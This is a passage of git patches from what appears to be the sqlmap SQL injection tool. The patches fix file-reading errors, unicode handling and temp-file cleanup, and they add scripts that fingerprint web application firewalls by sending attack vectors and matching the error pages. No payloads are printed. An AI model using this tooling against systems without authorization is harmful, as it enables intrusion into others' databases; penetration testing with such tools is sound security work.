         data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
         data += "    Title: %s\n" % title
-        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
+        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
         data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
     return data

From 40eb1973d70f9f8154ba51a6fa0ea9efd4b399d1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 23 Nov 2014 15:33:04 +0100
Subject: [PATCH 162/492] Patch for an Issue #961

---
 plugins/dbms/mssqlserver/enumeration.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 53a9728cc..d89d452e6 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -14,6 +14,7 @@ from lib.core.common import isNoneValue
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -49,6 +50,8 @@ class Enumeration(GenericEnumeration):
             users = kb.data.cachedUsers
 
         for user in users:
+            user = unArrayizeValue(user)
+
             if user is None:
                 continue
 

From 080a8739227491c0d1a38fbb26f3dfbd50e6ce4b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 23 Nov 2014 15:39:08 +0100
Subject: [PATCH 163/492] Patch for an Issue #964

---
 lib/core/common.py | 45 +++++++++++++++++++++++++--------------------
 1 file changed, 25 insertions(+), 20 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b415477bc..10c84d93d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1889,31 +1889,36 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
 
     checkFile(filename)
 
-    with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
-        for line in (f.readlines() if unicode_ else f.xreadlines()):  # xreadlines doesn't return unicode strings when codec.open() is used
-            if commentPrefix:
-                if line.find(commentPrefix) != -1:
-                    line = line[:line.find(commentPrefix)]
+    try:
+        with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
+            for line in (f.readlines() if unicode_ else f.xreadlines()):  # xreadlines doesn't return unicode strings when codec.open() is used
+                if commentPrefix:
+                    if line.find(commentPrefix) != -1:
+                        line = line[:line.find(commentPrefix)]
 
-            line = line.strip()
+                line = line.strip()
 
-            if not unicode_:
-                try:
-                    line = str.encode(line)
-                except UnicodeDecodeError:
-                    continue
+                if not unicode_:
+                    try:
+                        line = str.encode(line)
+                    except UnicodeDecodeError:
+                        continue
 
-            if line:
-                if lowercase:
-                    line = line.lower()
+                if line:
+                    if lowercase:
+                        line = line.lower()
 
-                if unique and line in retVal:
-                    continue
+                    if unique and line in retVal:
+                        continue
 
-                if unique:
-                    retVal[line] = True
-                else:
-                    retVal.append(line)
+                    if unique:
+                        retVal[line] = True
+                    else:
+                        retVal.append(line)
+    except (IOError, OSError), ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
+        raise SqlmapGenericException(errMsg)
 
     return retVal if not unique else retVal.keys()
 

From f853f8973fcae576b2353b4858c2a2fe16bc0571 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 23 Nov 2014 15:41:24 +0100
Subject: [PATCH 164/492] Minor refactorign

---
 lib/core/common.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 10c84d93d..35a14cc75 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -81,6 +81,7 @@ from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
@@ -845,7 +846,7 @@ def dataToTrafficFile(data):
     except IOError, ex:
         errMsg = "something went wrong while trying "
         errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
-        raise SqlmapGenericException(errMsg)
+        raise SqlmapSystemException(errMsg)
 
 def dataToDumpFile(dumpFile, data):
     dumpFile.write(data)
@@ -1918,7 +1919,7 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
     except (IOError, OSError), ex:
         errMsg = "something went wrong while trying "
         errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
-        raise SqlmapGenericException(errMsg)
+        raise SqlmapSystemException(errMsg)
 
     return retVal if not unique else retVal.keys()
 

From 28d6af6237ddb16f5ca1e17866439e35ec07d911 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 23 Nov 2014 15:42:41 +0100
Subject: [PATCH 165/492] Minor update

---
 lib/core/common.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 35a14cc75..977b0c85c 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -75,7 +75,6 @@ from lib.core.enums import PAYLOAD
 from lib.core.enums import REFLECTIVE_COUNTER
 from lib.core.enums import SORT_ORDER
 from lib.core.exception import SqlmapDataException
-from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapMissingDependence
@@ -997,7 +996,7 @@ def checkFile(filename):
     """
 
     if filename is None or not os.path.isfile(filename):
-        raise SqlmapFilePathException("unable to read file '%s'" % filename)
+        raise SqlmapSystemException("unable to read file '%s'" % filename)
 
 def banner():
     """
@@ -2820,7 +2819,7 @@ def openFile(filename, mode='r'):
         errMsg += "Please check %s permissions on a file " % ("write" if \
           mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
         errMsg += "and that it's not locked by another process."
-        raise SqlmapFilePathException(errMsg)
+        raise SqlmapSystemException(errMsg)
 
 def decodeIntToUnicode(value):
     """

From 69cdad414866ce2187262027fb7a88bd4ae23229 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 23 Nov 2014 15:55:12 +0100
Subject: [PATCH 166/492] Patch for an Issue #958

---
 lib/core/common.py | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 977b0c85c..7ad999438 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -992,10 +992,22 @@ def sanitizeStr(value):
 
 def checkFile(filename):
     """
-    Checks for file existence
+    Checks for file existence and readability
     """
 
+    valid = True
+
     if filename is None or not os.path.isfile(filename):
+        valid = False
+
+    if valid:
+        try:
+            with open(filename, "rb") as f:
+                pass
+        except:
+            valid = False
+
+    if not valid:
         raise SqlmapSystemException("unable to read file '%s'" % filename)
 
 def banner():

From 2284535267a2a84d387c55c4e283d7ce614f3524 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 24 Nov 2014 05:44:38 +0100
Subject: [PATCH 167/492] Update for an Issue #963

---
 lib/core/common.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 7ad999438..11bd5723c 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -557,6 +557,9 @@ def paramToDict(place, parameters=None):
         if len(parts) >= 2:
             parameter = urldecode(parts[0].replace(" ", ""))
 
+            if not parameter:
+                continue
+
             if conf.paramDel and conf.paramDel == '\n':
                 parts[-1] = parts[-1].rstrip()
 

From 2f744139fc1272311985185193435995be431b28 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 24 Nov 2014 10:13:56 +0100
Subject: [PATCH 168/492] Patch for an Issue #968

---
 lib/core/common.py |  2 +-
 lib/core/option.py | 12 +++++++++---
 2 files changed, 10 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 11bd5723c..53b425af4 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1930,7 +1930,7 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
                         retVal[line] = True
                     else:
                         retVal.append(line)
-    except (IOError, OSError), ex:
+    except (IOError, OSError, MemoryError), ex:
         errMsg = "something went wrong while trying "
         errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
         raise SqlmapSystemException(errMsg)
diff --git a/lib/core/option.py b/lib/core/option.py
index d0a3af309..986e1b080 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -90,6 +90,7 @@ from lib.core.exception import SqlmapMissingMandatoryOptionException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import FORMATTER
@@ -361,9 +362,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                         kb.targets.add((url, method, data, cookie, tuple(headers)))
                         addedTargetUrls.add(url)
 
-    fp = openFile(reqFile, "rb")
-
-    content = fp.read()
+    checkFile(reqFile)
+    try:
+        with openFile(reqFile, "rb") as f:
+            content = f.read()
+    except (IOError, OSError, MemoryError), ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
+        raise SqlmapSystemException(errMsg)
 
     if conf.scope:
         logger.info("using regular expression '%s' for filtering targets" % conf.scope)

From 05f7b1f1210514ad0a570187b2b7176c18b8baf6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 24 Nov 2014 10:55:19 +0100
Subject: [PATCH 169/492] Patch for an Issue #970

---
 lib/request/connect.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 346350755..997e307a1 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -355,6 +355,7 @@ class Connect(object):
             post = unicodeencode(post, kb.pageEncoding)
 
             if method:
+                method = unicodeencode(method)
                 req = MethodRequest(url, post, headers)
                 req.set_method(method)
             else:

From 816348f1ab8c9e2d2d134bb76f03250f7f3b68bc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 24 Nov 2014 11:54:04 +0100
Subject: [PATCH 170/492] Patch for an Issue #963

---
 lib/core/agent.py | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 9a33194bb..0581815c3 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -156,12 +156,27 @@ class Agent(object):
         elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
             retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
         else:
+            def _(pattern, repl, string):
+                retVal = string
+                match = None
+                for match in re.finditer(pattern, string):
+                    pass
+                if match:
+                    while True:
+                        _ = re.search(r"\\g<([^>]+)>", repl)
+                        if _:
+                            repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+                        else:
+                            break
+                    retVal = string[:match.start()] + repl + string[match.end():]
+                return retVal
+
             if origValue:
-                retVal = re.sub(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+                retVal = _(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             else:
-                retVal = re.sub(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+                retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             if retVal == paramString and urlencode(parameter) != parameter:
-                retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+                retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
 
         return retVal
 

From a0d95a8ec49ab0b41bd39c2bb537cb1d9bc07b9d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 24 Nov 2014 12:56:39 +0100
Subject: [PATCH 171/492] Refactoring of #952

---
 lib/request/httpshandler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index b20dc451a..67a2daea9 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -19,7 +19,7 @@ try:
 except ImportError:
     pass
 
-_protocols = [ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
+_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_SSLv3", "PROTOCOL_TLSv1", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
 
 class HTTPSConnection(httplib.HTTPSConnection):
     """

From 8cd40f8917febb4867145cf27264bb932892849f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 25 Nov 2014 13:54:26 +0100
Subject: [PATCH 172/492] Patch for an Issue #971

---
 lib/core/agent.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 0581815c3..4c35c9152 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -10,6 +10,7 @@ import re
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isNumber
 from lib.core.common import isTechniqueAvailable
@@ -87,7 +88,7 @@ class Agent(object):
 
         paramString = conf.parameters[place]
         paramDict = conf.paramDict[place]
-        origValue = paramDict[parameter]
+        origValue = getUnicode(paramDict[parameter])
 
         if place == PLACE.URI:
             paramString = origValue

From 605b126758b43d4811e058778981629bdb64b99a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 26 Nov 2014 13:38:21 +0100
Subject: [PATCH 173/492] Patch for an Issue #976

---
 lib/core/common.py      | 12 ++++++------
 lib/core/dump.py        |  2 +-
 lib/parse/configfile.py |  3 ++-
 lib/utils/crawler.py    |  3 ++-
 4 files changed, 11 insertions(+), 9 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 53b425af4..f954af023 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -861,7 +861,7 @@ def dataToOutFile(filename, data):
         retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
 
         try:
-            with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
+            with openFile(retVal, "wb") as f:
                 f.write(data)
         except IOError, ex:
             errMsg = "something went wrong while trying to write "
@@ -1813,7 +1813,7 @@ def readCachedFileContent(filename, mode='rb'):
         with kb.locks.cache:
             if filename not in kb.cache.content:
                 checkFile(filename)
-                with codecs.open(filename, mode, UNICODE_ENCODING) as f:
+                with openFile(filename, mode) as f:
                     kb.cache.content[filename] = f.read()
 
     return kb.cache.content[filename]
@@ -1878,7 +1878,7 @@ def initCommonOutputs():
     kb.commonOutputs = {}
     key = None
 
-    with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
+    with openFile(paths.COMMON_OUTPUTS, 'r') as f:
         for line in f.readlines():  # xreadlines doesn't return unicode strings when codec.open() is used
             if line.find('#') != -1:
                 line = line[:line.find('#')]
@@ -1905,7 +1905,7 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
     checkFile(filename)
 
     try:
-        with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
+        with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f:
             for line in (f.readlines() if unicode_ else f.xreadlines()):  # xreadlines doesn't return unicode strings when codec.open() is used
                 if commentPrefix:
                     if line.find(commentPrefix) != -1:
@@ -2822,13 +2822,13 @@ def showHttpErrorCodes():
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
 
-def openFile(filename, mode='r'):
+def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace"):
     """
     Returns file handle of a given filename
     """
 
     try:
-        return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
+        return codecs.open(filename, mode, encoding, errors)
     except IOError:
         errMsg = "there has been a file opening error for filename '%s'. " % filename
         errMsg += "Please check %s permissions on a file " % ("write" if \
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 43a86c740..4d048b2f7 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -87,7 +87,7 @@ class Dump(object):
     def setOutputFile(self):
         self._outputFile = os.path.join(conf.outputPath, "log")
         try:
-            self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
+            self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
         except IOError, ex:
             errMsg = "error occurred while opening log file ('%s')" % ex
             raise SqlmapGenericException(errMsg)
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index ec8f72100..7e1b07ad9 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -11,6 +11,7 @@ from ConfigParser import MissingSectionHeaderError
 from ConfigParser import ParsingError
 
 from lib.core.common import checkFile
+from lib.core.common import openFile
 from lib.core.common import unArrayizeValue
 from lib.core.common import UnicodeRawConfigParser
 from lib.core.data import conf
@@ -65,7 +66,7 @@ def configFileParser(configFile):
     logger.debug(debugMsg)
 
     checkFile(configFile)
-    configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
+    configFP = openFile(configFile, "rb")
 
     try:
         config = UnicodeRawConfigParser()
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 9554a76ca..cead9875d 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -16,6 +16,7 @@ import time
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import findPageForms
+from lib.core.common import openFile
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
 from lib.core.common import singleTimeWarnMessage
@@ -170,7 +171,7 @@ def storeResultsToFile(results):
         infoMsg = "writing crawling results to a temporary file '%s' " % filename
         logger.info(infoMsg)
 
-        with codecs.open(filename, "w+b", UNICODE_ENCODING) as f:
+        with openFile(filename, "w+b") as f:
             if conf.forms:
                 f.write("URL,POST\n")
 

From 0c99b79c60a9a603e4eafe33f26354fef0e5dcf2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 28 Nov 2014 00:54:03 +0100
Subject: [PATCH 174/492] Minor fix

---
 xml/errors.xml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/xml/errors.xml b/xml/errors.xml
index 20f6b9d2c..498a234de 100644
--- a/xml/errors.xml
+++ b/xml/errors.xml
@@ -50,7 +50,7 @@
     <dbms value="IBM DB2">
         <error regexp="CLI Driver.*DB2"/>
         <error regexp="DB2 SQL error"/>
-        <error regexp="db2_\w+\("/>
+        <error regexp="\bdb2_\w+\("/>
     </dbms>
 
     <!-- Informix -->

From e8673b9accec104f5bba4ecae423361c600ec5e1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 28 Nov 2014 13:32:41 +0100
Subject: [PATCH 175/492] Update of modsecurity.py WAF script

---
 waf/modsecurity.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/waf/modsecurity.py b/waf/modsecurity.py
index 6827d6945..d1d995452 100644
--- a/waf/modsecurity.py
+++ b/waf/modsecurity.py
@@ -19,6 +19,7 @@ def detect(get_page):
         page, headers, code = get_page(get=vector)
         retval = code == 501 and re.search(r"Reference #[0-9A-Fa-f.]+", page, re.I) is None
         retval |= re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        retval |= "This error was generated by Mod_Security" in page
         if retval:
             break
 

From 2115fc1491a9694b4af433e388e384fc31c20789 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 28 Nov 2014 14:03:53 +0100
Subject: [PATCH 176/492] New WAF script

---
 waf/requestvalidationmode.py | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 waf/requestvalidationmode.py

diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py
new file mode 100644
index 000000000..4042ca850
--- /dev/null
+++ b/waf/requestvalidationmode.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.common import randomInt
+
+__product__ = "ASP.NET RequestValidationMode (Microsoft)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"ASP\.NET has detected data in the request that is potentially dangerous", page, re.I) is not None
+        if retval:
+            break
+
+    return retval

From f47b493a24d598bd09fc74b39dd0fc14be6633dc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 28 Nov 2014 14:10:31 +0100
Subject: [PATCH 177/492] Minor update

---
 waf/requestvalidationmode.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py
index 4042ca850..d1557255f 100644
--- a/waf/requestvalidationmode.py
+++ b/waf/requestvalidationmode.py
@@ -5,7 +5,7 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.common import randomInt
+from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "ASP.NET RequestValidationMode (Microsoft)"
 
@@ -14,7 +14,8 @@ def detect(get_page):
 
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
-        retval = re.search(r"ASP\.NET has detected data in the request that is potentially dangerous", page, re.I) is not None
+        retval = "ASP.NET has detected data in the request that is potentially dangerous" in page
+        retval |= "Request Validation has detected a potentially dangerous client input value" in page
         if retval:
             break
 

From ab49fe6a3902da6d35c704e8f8769157fba5a92f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 28 Nov 2014 15:00:39 +0100
Subject: [PATCH 178/492] New WAF script

---
 waf/expressionengine.py | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 waf/expressionengine.py

diff --git a/waf/expressionengine.py b/waf/expressionengine.py
new file mode 100644
index 000000000..a3bbdf5a3
--- /dev/null
+++ b/waf/expressionengine.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "ExpressionEngine (EllisLab)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = "Invalid GET Data" in page
+        if retval:
+            break
+
+    return retval

From 56b6bf72f440a40cb0c58a2552b721bf5f437a8d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 29 Nov 2014 23:33:24 +0100
Subject: [PATCH 179/492] Patch for an Issue #978

---
 lib/core/common.py   |  5 ++++-
 lib/core/convert.py  | 10 +++++++---
 lib/parse/cmdline.py |  2 +-
 3 files changed, 12 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index f954af023..4b40747a0 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2068,7 +2068,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
             try:
                 return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
             except UnicodeDecodeError, ex:
-                value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
+                try:
+                    return unicode(value, UNICODE_ENCODING)
+                except:
+                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
     else:
         try:
             return unicode(value)
diff --git a/lib/core/convert.py b/lib/core/convert.py
index d0646e21b..5979c9d91 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -145,17 +145,21 @@ def htmlunescape(value):
     return retVal
 
 def singleTimeWarnMessage(message):  # Cross-linked function
-    raise NotImplementedError
+    sys.stdout.write(message)
+    sys.stdout.write("\n")
+    sys.stdout.flush()
 
 def stdoutencode(data):
     retVal = None
 
     try:
+        data = data or ""
+
         # Reference: http://bugs.python.org/issue1602
         if IS_WIN:
-            output = data.encode("ascii", "replace")
+            output = data.encode(sys.stdout.encoding, "replace")
 
-            if output != data:
+            if '?' in output:
                 warnMsg = "cannot properly display Unicode characters "
                 warnMsg += "inside Windows OS command prompt "
                 warnMsg += "(http://bugs.python.org/issue1602). All "
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 81fade009..c916b3278 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -791,7 +791,7 @@ def cmdLineParser():
         advancedHelp = True
 
         for arg in sys.argv:
-            argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+            argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
 
         checkDeprecatedOptions(argv)
 

From f71a65a9a0fcb3cc54cde4cf26b24a9567d10ce5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Dec 2014 00:29:25 +0100
Subject: [PATCH 180/492] Patch for an Issue #979

---
 lib/core/bigarray.py | 18 ++++--------------
 lib/core/settings.py |  3 +++
 sqlmap.py            |  9 +++++++++
 3 files changed, 16 insertions(+), 14 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index aaa6d2e56..f9bb76efb 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -15,6 +15,7 @@ import tempfile
 
 from lib.core.exception import SqlmapSystemException
 from lib.core.settings import BIGARRAY_CHUNK_LENGTH
+from lib.core.settings import BIGARRAY_TEMP_PREFIX
 
 class Cache(object):
     """
@@ -35,14 +36,12 @@ class BigArray(list):
         self.chunks = [[]]
         self.cache = None
         self.filenames = set()
-        self.protected = False
         self._os_remove = os.remove
 
     def append(self, value):
         self.chunks[-1].append(value)
         if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
             filename = self._dump(self.chunks[-1])
-            del(self.chunks[-1][:])
             self.chunks[-1] = filename
             self.chunks.append([])
 
@@ -65,7 +64,7 @@ class BigArray(list):
 
     def _dump(self, value):
         try:
-            handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
+            handle, filename = tempfile.mkstemp(prefix=BIGARRAY_TEMP_PREFIX)
             self.filenames.add(filename)
             os.close(handle)
             with open(filename, "w+b") as fp:
@@ -85,12 +84,11 @@ class BigArray(list):
                 self.cache = Cache(index, pickle.load(fp), False)
 
     def __getstate__(self):
-        self.protected = True
-        return self.chunks, self.filenames, self.protected
+        return self.chunks, self.filenames
 
     def __setstate__(self, state):
         self.__init__()
-        self.chunks, self.filenames, self.protected = state
+        self.chunks, self.filenames = state
 
     def __getslice__(self, i, j):
         retval = BigArray()
@@ -132,11 +130,3 @@ class BigArray(list):
 
     def __len__(self):
         return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
-
-    def __del__(self):
-        if not self.protected:
-            for filename in self.filenames:
-                try:
-                    self._os_remove(filename)
-                except:
-                    pass
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4fe7e7447..63929d00d 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -441,6 +441,9 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
